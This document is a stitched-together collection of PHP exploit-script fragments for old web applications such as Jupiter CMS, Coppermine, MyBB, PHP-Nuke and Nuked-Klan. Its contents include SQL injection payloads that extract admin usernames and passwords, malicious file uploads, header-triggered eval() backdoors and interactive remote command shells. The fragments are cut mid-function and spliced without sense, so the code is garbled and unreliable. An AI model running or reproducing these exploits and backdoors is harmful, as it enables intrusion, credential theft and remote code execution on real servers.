function main()
{
// :)
$web = new phpsploit();
$web->agent('Mozilla Firefox');
// Hey ya :)
head();
// Target
$url = get_p('url', true);
// Proxy options
$prh = get_p('proxhost');
$pra = get_p('proxauth');
// Use a proxy ?
if ($prh) {
// host:ip
$web->proxy($prh);
// Authentication
if ($pra) {
$web->proxyauth($pra);
}
}
// Single quote bypass
$byp = "1');";
// PHP code
$php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
// Separator
$s_sep = md5(rand(0, 1000000000) . 'HEY_YA');
$c_sep = "print('{$s_sep}');";
// Final PHP code
$final = $byp . $c_sep . $php . $c_sep . 'exit();//';
// Welcome guess !
while (($cmd = cmd_prompt()) !== false) {
// magic_quotes_gpc bypass
$web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");'));
// Go =]
$web->get($url . 'index.php?fields=' . to_char($final) . ',1');
// Result
$res = explode($s_sep, $web->getcontent());
// Erf
if (!isset($res[1])) {
print "\nFailed";
exit(1);
} else {
if (empty($res[1])) {
print "\nNo output: system() disabled OR cmd failed OR cmd without output";
} else {
print "\n" . $res[1];
}
}
}
return;
}
# 82. array_walk($_GET,'url_protect');
# 83. extract($_GET, EXTR_OVERWRITE);
#
# 106. if (!empty($_COOKIE)) {
# 107. if (!$magicquotesGPC)
# 108. array_walk($_COOKIE,'addslashes_GPC');
# 109. reset($_COOKIE);
# 110. array_walk($_COOKIE,'url_protect');
# 111. extract($_COOKIE, EXTR_OVERWRITE);
#
# 132. if (!empty($_FILES)) {
# 133. while (list($key,$value)=each($_FILES)) {
# 134. $$key=$value['tmp_name'];
# 135. }
#
$xpl->get($url . "print.php?_FILES[DB][tmp_name]=links_links%20union%20select%20-1,{$aid},{$pwd},1%20ORDER%20BY%20url%23&lid=1");
if (preg_match("#BEGINUSR(.*)ENDUSR#", $xpl->getcontent(), $aid) and preg_match("#BEGINPWD(.*)ENDPWD#", $xpl->getcontent(), $pwd)) {
print "\nAdmin_aid: {$aid['1']}\nAdmin_pwd: {$pwd['1']}";
} else {
die("Exploit failed");
}
# +auth.inc.php (ADMIN AUTH)
# |
# 59. if ($admin!="") {
# 60. $Xadmin = base64_decode($admin);
# 61. $Xadmin = explode(":", $Xadmin);
# 62. $aid = urlencode($Xadmin[0]);
# 63. $AIpwd = $Xadmin[1];
# 64. if ($aid=="" or $AIpwd=="") {
# 65. Admin_Alert("Null Aid or Passwd");
# 66. }
<?php
/*
Title: Jupiter CMS 1.1.5 File Upload Vulnerability
Advisory ID: 12070214
Risk level: High
Author: DarkFig <*****@*****.**>
URL: http://www.acid-root.new.fr/advisories/12070214.txt
*/
error_reporting(E_ALL ^ E_NOTICE);
$url = ' http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$arr = array(frmdt_url => $url . 'modules/emoticons.php', "a" => 1, "req_file" => array(frmdt_filename => "iamaphpfile.php", frmdt_type => "image/jpeg", frmdt_content => "<?php echo(iamontheserver); ?>"));
$xpl->formdata($arr);
$xpl->get($url . 'images/emoticons/iamaphpfile.php');
print $xpl->getcontent();
/*
*
* Copyright (C) darkfig
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
|
+-> $_FILES can be overwritten (with extract()), this can lead to file disclosure =).
*/
$url = $argv[1];
$prs = $argv[2];
$pra = $argv[3];
$xpl = new phpsploit();
if (!empty($prs)) {
$xpl->proxy($prs);
}
if (!empty($pra)) {
$xpl->proxyauth($pra);
}
print "\nheader> Aztek Forum 4.1 Multiple Vulnerabilities Exploit";
print "\nheader> ==================================================";
if (preg_match("#href='\\./index\\.php\\?owner=(\\S*)'#i", $xpl->getcontent($xpl->get($url . 'forum.php?fid=-1%20or%201=1')), $matches)) {
print "\nsploit> Owner -> " . $matches[1];
} else {
die("\nsploit> Exploit failed");
}
$owner = $matches[1];
print "\nstatus> Trying to register a new user";
$xpl->cookiejar(1);
$xpl->allowredirection(1);
$name = "phpsploit" . rand();
$xpl->post($url . "index.php?owner={$owner}&action=subscribe", "login={$name}&passwd={$name}&passwd2={$name}&email={$name}%40hotmail.coum&show_email=on&cookie=on");
print "\nsploit> Login/Password -> {$name}";
print "\nstatus> Trying to get database informations";
$xpl->get($url . "forum.php?fid=XD");
if (preg_match("#file (.*) in function#i", $xpl->getcontent(), $matches)) {
print "\nsploit> Full Path Disclosure -> " . $matches[1];
print "\nheader> ===============================================";
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader> ===============================================";
if (!empty($pxs)) {
print "\nstatus> Using a proxy {$pxs}";
$xpl->proxy($pxs);
}
if (!empty($pxa)) {
print "\nstatus> Basic proxy authentification {$pxa}";
$xpl->proxyauth($pxa);
}
/*/
Table prefix.
/*/
print "\nstatus> Searching the version";
$xpl->get($url . 'include/index.html');
if (preg_match("#Coppermine version: ([0-9]*\\.[0-9]*\\.[0-9]*)#", $xpl->getcontent(), $matches)) {
print "\nsploit> Coppermine version " . $matches[1];
} else {
print "\nsploit> Not found";
}
$table = !empty($matches[1]) ? 'cpg' . str_replace('.', '', $matches[1]) . '_users' : 'cpg1410_users';
/*/
If you have the admin cookie (but not the password),
replace lines 73=>76 by $xpl->addcookie('yourcookie');
/*/
print "\nstatus> Trying to get logged in";
$xpl->post($url . "login.php?referer=index.php", "username={$adu}&password={$adp}&remember_me=1&submitted=Se+Connecter");
if (!preg_match("#color:red#", $xpl->getcontent())) {
print "\nsploit> Done";
} else {
*
* Simple SQL injection (register_globals=off ; magic_quotes_gpc=on).
* What we want is not in the database, it's in a file (config.php):
*
* //this are the logins for the admin part. Change them for security.
* $login = "******"; //your login for the admin section.
* $pass = "******"; //your login for the admin section.
*
* PS: Les chr() ont été utilisés dans le but de se foutre de
* la gueule des personnes l'utilisant seulement pour d4 h4x0r styl3 =).
*
*/
$header = chr(0x2f) . chr(0x3c) . chr(0x68) . chr(0x74) . chr(0x6d) . chr(0x6c) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x68) . chr(0x65) . chr(0x61) . chr(0x64) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x74) . chr(0x69) . chr(0x74) . chr(0x6c) . chr(0x65) . chr(0x3e) . chr(0x63) . chr(0x6f) . chr(0x6e) . chr(0x74) . chr(0x65) . chr(0x6e) . chr(0x74) . chr(0x66) . chr(0x72) . chr(0x61) . chr(0x6d) . chr(0x65) . chr(0x3c) . chr(0x5c) . chr(0x2f) . chr(0x74) . chr(0x69) . chr(0x74) . chr(0x6c) . chr(0x65) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x6c) . chr(0x69) . chr(0x6e) . chr(0x6b) . chr(0x20) . chr(0x68) . chr(0x72) . chr(0x65) . chr(0x66) . chr(0x3d) . chr(0x22) . chr(0x5c) . chr(0x2f) . chr(0x73) . chr(0x74) . chr(0x79) . chr(0x6c) . chr(0x65) . chr(0x2e) . chr(0x63) . chr(0x73) . chr(0x73) . chr(0x22) . chr(0x20) . chr(0x72) . chr(0x65) . chr(0x6c) . chr(0x3d) . chr(0x22) . chr(0x73) . chr(0x74) . chr(0x79) . chr(0x6c) . chr(0x65) . chr(0x73) . chr(0x68) . chr(0x65) . chr(0x65) . chr(0x74) . chr(0x22) . chr(0x20) . chr(0x74) . chr(0x79) . chr(0x70) . chr(0x65) . chr(0x3d) . chr(0x22) . chr(0x74) . chr(0x65) . chr(0x78) . chr(0x74) . chr(0x5c) . chr(0x2f) . chr(0x63) . chr(0x73) . chr(0x73) . chr(0x22) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x6d) . chr(0x65) . chr(0x74) . chr(0x61) . chr(0x20) . chr(0x68) . chr(0x74) . chr(0x74) . chr(0x70) . chr(0x2d) . chr(0x65) . chr(0x71) . chr(0x75) . chr(0x69) . chr(0x76) . chr(0x3d) . chr(0x22) . chr(0x43) . chr(0x6f) . chr(0x6e) . chr(0x74) . chr(0x65) . chr(0x6e) . chr(0x74) . chr(0x2d) . chr(0x54) . chr(0x79) . chr(0x70) . chr(0x65) . chr(0x22) . chr(0x20) . chr(0x63) . chr(0x6f) . chr(0x6e) . chr(0x74) . chr(0x65) . chr(0x6e) . chr(0x74) . chr(0x3d) . chr(0x22) . chr(0x74) . chr(0x65) . chr(0x78) . chr(0x74) . chr(0x5c) . chr(0x2f) . chr(0x68) . chr(0x74) . chr(0x6d) . chr(0x6c) . chr(0x3b) . chr(0x20) . chr(0x63) . chr(0x68) . chr(0x61) . chr(0x72) . chr(0x73) . chr(0x65) . chr(0x74) . chr(0x3d) . chr(0x69) . chr(0x73) . chr(0x6f) . chr(0x2d) . chr(0x38) . chr(0x38) . chr(0x35) . chr(0x39) . chr(0x2d) . chr(0x31) . chr(0x22) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x5c) . chr(0x2f) . chr(0x68) . chr(0x65) . chr(0x61) . chr(0x64) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x62) . chr(0x6f) . chr(0x64) . chr(0x79) . chr(0x3e) . chr(0x2f);
$sql = chr(0x70) . chr(0x61) . chr(0x67) . chr(0x65) . chr(0x2e) . chr(0x70) . chr(0x68) . chr(0x70) . chr(0x3f) . chr(0x69) . chr(0x64) . chr(0x3d) . chr(0x2d) . chr(0x31) . chr(0x2f) . chr(0x2a) . chr(0x2a) . chr(0x2f) . chr(0x75) . chr(0x6e) . chr(0x69) . chr(0x6f) . chr(0x6e) . chr(0x2f) . chr(0x2a) . chr(0x2a) . chr(0x2f) . chr(0x73) . chr(0x65) . chr(0x6c) . chr(0x65) . chr(0x63) . chr(0x74) . chr(0x2f) . chr(0x2a) . chr(0x2a) . chr(0x2f) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6c) . chr(0x6f) . chr(0x61) . chr(0x64) . chr(0x5f) . chr(0x66) . chr(0x69) . chr(0x6c) . chr(0x65) . chr(0x28) . chr(0x63) . chr(0x6f) . chr(0x6e) . chr(0x63) . chr(0x61) . chr(0x74) . chr(0x28) . concatcharfu($file) . chr(0x29) . chr(0x29) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c);
$footer = chr(0x2f) . chr(0x3c) . chr(0x5c) . chr(0x2f) . chr(0x62) . chr(0x6f) . chr(0x64) . chr(0x79) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x5c) . chr(0x2f) . chr(0x68) . chr(0x74) . chr(0x6d) . chr(0x6c) . chr(0x3e) . chr(0x2f);
$xpl->get($url . $sql);
$ct = preg_replace($footer, '', $xpl->getcontent());
print preg_replace($header, '', $ct);
function concatcharfu($file)
{
$dat = '';
for ($i = 0; $i < strlen($file); $i++) {
$dat .= 'char(' . ord($file[$i]) . ')';
if ($i != strlen($file) - 1) {
$dat .= ',';
}
}
return $dat;
}
class phpsploit
{
$xpl->proxyauth($pra);
}
print "0x01>Deleting the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'suppr=1');
print "\n0x02>Creating the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
print "\n0x03>Trying to log in as Administrator";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
// Minimum data necessary (fwrite without quote)
$minimdata = 'WIDTH_TREE_FRAME=1&FRAME_BORDER=1&WIDTH_FRAME_BORDER=1&WIDTH_FRAME_SP' . 'ACING=1&SCROLING_TREE_FRAME=1&RESIZE_FRAME=1&WIDTH_TD_SIZE=1&WIDTH_TD' . '_TYPE=1&WIDTH_TD_DATE=1&STYLE=1&TOTALSIZE=1&CHECK_MAJ=1&IMAGE_BROWSER' . '=1&IMAGE_TN=1&GD2=1&IMAGE_JPG=1&IMAGE_GIF=1&IMAGE_BMP=1&IMAGE_TN_SIZE' . '=1&IMAGE_TN_COMPRESSION=1&NB_COLL_TN=1&EXIF_READER=1&SLIDE_SHOW=1&DEB' . 'UG=0;' . urlencode($cod) . '//&SLIDE_SHOW_INT=1&BACK=1&WRITE_TN=1&AUTO_RE' . 'SIZE=1&DETAILS=1&DIRINFO_LIFE=1&activer_Message=1';
print "\n0x04>Creating the file config.inc.php";
$xpl->post($url . 'dirsys/modules/config/post.php', $minimdata);
print "\n0x05>Now enter your commands";
do {
$xpl->addheader('Shell', "@system({$cmd});");
$xpl->get($url . 'dirsys/config.inc.php');
print $xpl->getcontent() . "\n0x06>";
} while (!eregi('^quit|exit$', $cmd = trim(fgets(STDIN))));
exit(0);
function getparam($param, $opt = '')
{
global $argv;
foreach ($argv as $value => $key) {
if ($key == '-' . $param) {
return $argv[$value + 1];
}
}
if ($opt) {
usage();
} else {
return FALSE;
# lastactive: 1175444369
#
# $xpl->addheader('Client-IP','127.0.0.1');
# $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
#
# I decided to use the solution number 2.
# We can also add an administrator (easily) ... but it's not interesting.
#
print "\nAdmin IP : ";
$ip = sql_inject('ip');
print "\nAdmin sid: ";
$sid = sql_inject('sid');
print "\nTrying to be logged in as administrator";
$xpl->addheader('Client-IP', $ip);
$xpl->get($url . "admin/languages.php?adminsid={$sid}");
# Trying to find the language
if (preg_match('#<input type="hidden" name="lang" value="(\\S*)"#', $xpl->getcontent(), $langmatches)) {
$lang = $langmatches[1];
} else {
$lang = 'english';
}
print "\nLanguage: {$lang}";
# Language configuration
$xpl->get($url . "admin/languages.php?adminsid={$sid}&action=edit&lang={$lang}&editwith=0&file={$filetoed}");
preg_match_all('#name="(.*)">(.*)</textarea>#', $xpl->getcontent(), $name_value);
# We can't use:
# - <? OR <?php
# - <script language="php">
# - ' OR "
#
}
# +nukesentinel.php
# 49. if($ab_config['disable_switch'] > 0) { return; }
# 414. if($ab_config['track_active'] == 1 AND !is_excluded($nsnst_const['remote_ip'])) {
# 458. $db->sql_query("INSERT INTO `".$prefix."_nsnst_tracked_ips` (`user_id`, `username`, `date`, `ip_addr`, `ip_long`, `page`,
# `user_agent`, `refered_from`, `x_forward_for`, `client_ip`, `remote_addr`, `remote_port`, `request_method`,
# `c2c`) VALUES ('".$nsnst_const['ban_user_id']."', '$ban_username2', '".$nsnst_const['ban_time']."',
# '".$nsnst_const['remote_ip']."', '".$nsnst_const['remote_long']."', '$pg', '$user_agent', '$refered_from',
# '".$nsnst_const['forward_ip']."', '".$nsnst_const['client_ip']."', '".$nsnst_const['remote_addr']."',
# '".$nsnst_const['remote_port']."', '".$nsnst_const['request_method']."', '$c2c')");
#
# We insert a row in $prefix."_nsnst_tracked_ips".
#
print "\nInserting a row in {$prfix}_nsnst_tracked_ips";
$xpl->addheader("Client-IP", "255.255.255.255");
$xpl->get($url . 'index.php');
# Trying to find a valid tid.
# Needed for $tum > 0.
#
print "\nTrying to find a valid tid (max hits={$nbtst})";
$sql = "' OR 1=1#";
$xpl->addcookie("admin", urlencode(base64_encode($sql . ':1:')));
for ($c = $tid; $c <= $nbtst; $c++) {
$xpl->get($url . "includes/nsbypass.php?tid={$c}");
if (!preg_match("#phpnuke.org#", $xpl->getheader())) {
$tid = $c;
print "\nValid tid found: {$tid}\nHash: {$login} -> ";
break;
}
if ($c == $nbtst) {
exit("\n#1 Exploit failed");
/* Code in the fake avatar */
if ($mode == 0) {
$file_upload_code = '<?php if(isset($_POST[\'d\'])) unlink(__FILE__); ?><?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"><input type="submit" name="d" value="x"></center></form><br><form method="get"></form>';
$c0de = '<?php' . "\n" . 'error_reporting(0);' . "if(isset(\$_SERVER['HTTP_UPLOAD'])) { \$f=fopen('w00t.php','w');fputs(\$f,'" . preg_replace("#'#i", "\\'", $file_upload_code) . "');print 'upfiledone'; }\n" . 'include("include/files/accueil.php"); ?>';
} else {
$c0de = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'include("include/files/accueil.php"); ?>';
}
/* Upload avatar with PHP c0de */
print " * uploading avatar\t";
$avatar = array(frmdt_url => $url . '?page=avatars&op=modify', 'avatar' => array(frmdt_filename => '1.gif', frmdt_type => 'image/gif', frmdt_content => $c0de), 'id' => 1, 'mode' => 'J', 'avatarurl' => '', 'avatarremoteurl' => '', 'MAX_FILE_SIZE' => 999999);
if (preg_match("#location.href='\\?page=avatars&id=\\d+&mode=J'#i", $xpl->formdata($avatar))) {
print "done\n";
} else {
die("error\n");
}
if (preg_match('#<span style="float: right;" ><img src="([^"]+)#i', $xpl->get($url . '?page=joueurs&id=1'), $match)) {
$img = $match[1];
} else {
die(" * can't find image name\n");
}
/* Change homepage to our avatar, with a null byte, after saving website name. */
print " * changing homepage\t";
preg_match('#name=nomsite value="([^ ]+)"#i', $xpl->get($url . '?page=configuration&op=admin'), $all);
$postdata = "nomsite={$all['1']}&urlsite={$url}&logo=logo.gif&pagestart=../.{$img}%00&inscription_joueur=1&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=®lement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&ircserver=euroserv.fr.quakenet.org&ircport=6667&ircpassword=&ircchannels=%23phptournois+%23lan+%23lan.cs+%23lan.q3&mail=N&smtpserver=&smtpuser=&smtppassword="******"done\n";
$success = true;
if ($mode == 0) {
print " * loading uploader\t";
$xpl->addheader("upload", "1");
if (preg_match("#upfiledone#i", $xpl->get($url))) {
print "\n";
} else {
/* --- ATTACK #1: LOGIN GUESSING --- */
print "[*] Attack #1\n";
$default = array(array("*****@*****.**", "admin"), array("*****@*****.**", "cinema"));
for ($i = 0; $i < sizeof($default); $i++) {
print "[*] Trying with " . $default[$i][0] . ":" . $default[$i][1];
if (attack($default[$i][0], $default[$i][1]) == 1) {
exit;
}
}
print "[*] Attack failed.\n\n";
/* --- ATTACK #2: MAGIC_QUOTES_GPC --- */
print "[*] Attack #2\n";
print "[*] magic_quotes_gpc=";
$c = $xpl->get($url . "phpinfo.php");
if ($c && preg_match('#<tr><td class="e">magic_quotes_gpc</td><td class="v">([^<]+)</td>#i', $c, $b)) {
print "{$b['1']}\n";
} else {
print "?\n";
}
if ($b[1] != "On" && false) {
attack("'%20OR%20(priv=%27admin%27%20AND%201=1)%20/*", 'hell0');
if ($b[1] == "Off") {
exit;
}
} else {
print "[*] Attack failed.\n\n";
}
/* --- ATTACK #3: SQL INJECTION --- */
print "[*] Attack #3\n";
if (preg_match("#{$prefix}sess_id=([a-z0-9]+)#i", $c, $sid) && preg_match("#uid=([a-z0-9]+)#i", $c, $uid)) {
# User Cookies
$xpl->addcookie("{$prefix}sess_id", $sid[1]);
$xpl->addcookie("{$prefix}user_id", $uid[1]);
} else {
exit("[*] Can't log in\n");
}
}
$queries = array();
$queries[] = array(" SID", "SELECT id FROM nuked_sessions WHERE user_id=(SELECT id FROM {$prefix}users WHERE niveau>=9 ORDER BY date LIMIT 0,1) LIMIT 0,1");
$queries[] = array(" UID", "SELECT id FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
$queries[] = array(" Login", "SELECT pseudo FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
$queries[] = array("Password", "SELECT pass FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
$xpl->agent("Mozilla Firefox");
$xpl->addheader("X-Forwarded-For", "127.0.0.1");
$ctmp = $xpl->get($url . "index.php?file=Stats&page=visits");
if (preg_match('#<a href="javascript:history.back\\(\\)"><b>[^<]+</b>#i', $ctmp)) {
exit("[*] You don't have rights to access Stats page.\n");
}
if (preg_match('#<a href="index.php\\?file=User&op=login_screen">[^<]+</a> | <a href="index.php\\?file=User&op=reg_screen">[^<]+</a>#i', $ctmp)) {
exit("[*] You must be registered, use -user param.\n");
}
$xpl->reset("header");
$xpl->agent("Mozilla Firefox");
attack1();
attack2();
}
function getparam($param, $opt = '')
{
global $argv;
foreach ($argv as $value => $key) {
| ... if (isset($_GET['lang']) && $_GET['lang'] && file_exists($chem_absolu."languages/".$_GET['lang'].".".$alex_livre_ext))
| $f_language = str_replace("..","",$_GET['lang']); // We can't use .... because of file_exists() verification but ... =]
| include($chem_absolu."languages/".$f_language.".".$alex_livre_ext);
|
|
| index.php -> SQL Injection
| =========
| ... sql_select_query("msg", "alex_livre_txt_lang", "WHERE lang='".$f_language."' and `type`='titre'");
| // "SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and type=`titre`
|
/*/
$sql = "index.php?lang=english.php%00'%20union%20select%20" . "concat('XPLLogin:'******'XPLPass:'******'#<div class="d_title">XPLLogin:(.*)XPLPass:(.*)</div>#', $xpl->getcontent(), $count)) {
print "\nsploit> AdminUsername::" . $count[1] . "\nsploit> AdminPassword::" . $count[2];
} else {
die("\nsploit> Exploit failed");
}
print "\nstatus> Trying to get logged in";
$xpl->post($url . "admin/index.php", "f_login="******"&f_pass="******"&f_identif=Identification");
if (preg_match("#f_cadres\\.php\\?f_sid=([a-z0-9]{32})#", $xpl->getheader(), $sid)) {
print "\nsploit> Done";
} else {
die("\nsploit> Exploit failed");
}
print "\nstatus> Trying to add a skin";
// skins.php ... @mkdir($chem_absolu."templates/skins/".$_POST['aj_skin']."/", 0755)
$xpl->post($url . "admin/skins.php?f_sid=" . $sid[1], "aj_skin=../../languages/d4h4x0rskin&ajouter=Ajouter");
<?php
/*
Title: Jupiter CMS 1.1.5 SQL Injection Vulnerability
Advisory ID: 12070214
Risk level: High
Author: DarkFig <*****@*****.**>
URL: http://www.acid-root.new.fr/advisories/12070214.txt
*/
error_reporting(E_ALL ^ E_NOTICE);
$url = 'http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$hev = "-1' UNION SELECT CONCAT('" . "[BEGIN_XPL_USER]'," . "(SELECT username FROM users LIMIT 0,1),'" . "[END_XPL_USER]','" . "[BEGIN_XPL_PWD]'," . "(SELECT password FROM users LIMIT 0,1),'" . "[END_XPL_PWD]'),1 #";
$xpl->addheader("Client-IP", $hev);
$xpl->get($url);
preg_match("#\\[BEGIN_XPL_USER\\](.*)\\[END_XPL_USER\\]#", $xpl->getcontent(), $usr);
preg_match("#\\[BEGIN_XPL_PWD\\]([a-z0-9]{32})\\[END_XPL_PWD\\]#", $xpl->getcontent(), $pwd);
print $usr[1] . '::' . $pwd[1];
/*
*
* Copyright (C) darkfig
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# cookie prefix
$config[] = 'ORDER by date LIMIT 1';
# sql conditions
$config[] = 'HAK';
# match, length <= 3
$config[] = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'else {include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>';
$request = array();
$request[] = "'{$config['3']}0',(SELECT pseudo FROM {$config['0']}_users {$config['2']}),'{$config['3']}0'";
$request[] = "'{$config['3']}1',(SELECT pass FROM {$config['0']}_users {$config['2']}),'{$config['3']}1'";
$request[] = "'{$config['3']}2',(SELECT id FROM {$config['0']}_users {$config['2']}),'{$config['3']}2'";
$request[] = "'{$config['3']}3',(SELECT id FROM {$config['0']}_sessions WHERE user_id=(SELECT id FROM {$config['0']}_users {$config['2']})),'{$config['3']}3'";
for ($i = 0; $i < count($request); $i++) {
$deb = rand(0, 10000) . "',2," . (time() + 500000) . ",'',(SELECT CONCAT(";
$sql = $deb . $request[$i] . "))) #";
$xpl->addheader("X-Forwarded-For", $sql);
$xpl->get($url);
$xpl->reset('header');
}
if (!preg_match_all("#{$config['3']}([0123]{1})(\\S*){$config['3']}([0123]{1})#", $xpl->getcontent(), $matches)) {
die("Exploit Failed");
}
$what = array("login", "passwd", "user_id", "session");
for ($i = 0; $i < count($what); $i++) {
print "\n" . $what[$i] . " -> " . $matches[2][$i];
}
if (empty($matches[2][3])) {
exit("\nNo session found");
}
# Logged in as admin
$name = array("admin_session", "user_id", "sess_id");
$xpl->addcookie($config[1] . '_' . $name[0], $matches[2][2]);
#
#
# 1004. function abget_template($template="") {
# 1013. $filename = "abuse/".$template; // $template = ../config.php
# 1014. if(!file_exists($filename)) { $filename = "abuse/abuse_default.tpl"; }
# 1015. $handle = @fopen($filename, "r");
# 1016. $display_page = fread($handle, filesize($filename));
# 1017. @fclose($handle);
# 1041. return $display_page;
# 1042. }
#
# Interesting isn't it ? :]
#
$sql = "' UNION SELECT 1,2,3,4,5,6,7," . mysqlchar("' UNION SELECT -666,2,3,4,5,6,7,'../{$file}',9,10,11 ORDER BY blocker #") . ",9,10,11,12,13,14,15,16,17,18#255.255.255.255";
$xpl->addheader("Client-IP", $sql);
$xpl->get($url . 'index.php');
print $xpl->getcontent();
function mysqlchar($data)
{
$char = 'CHAR(';
for ($i = 0; $i < strlen($data); $i++) {
$char .= ord($data[$i]);
if ($i != strlen($data) - 1) {
$char .= ',';
}
}
return $char . ')';
}
function getparam($param, $opt = '')
{
global $argv;
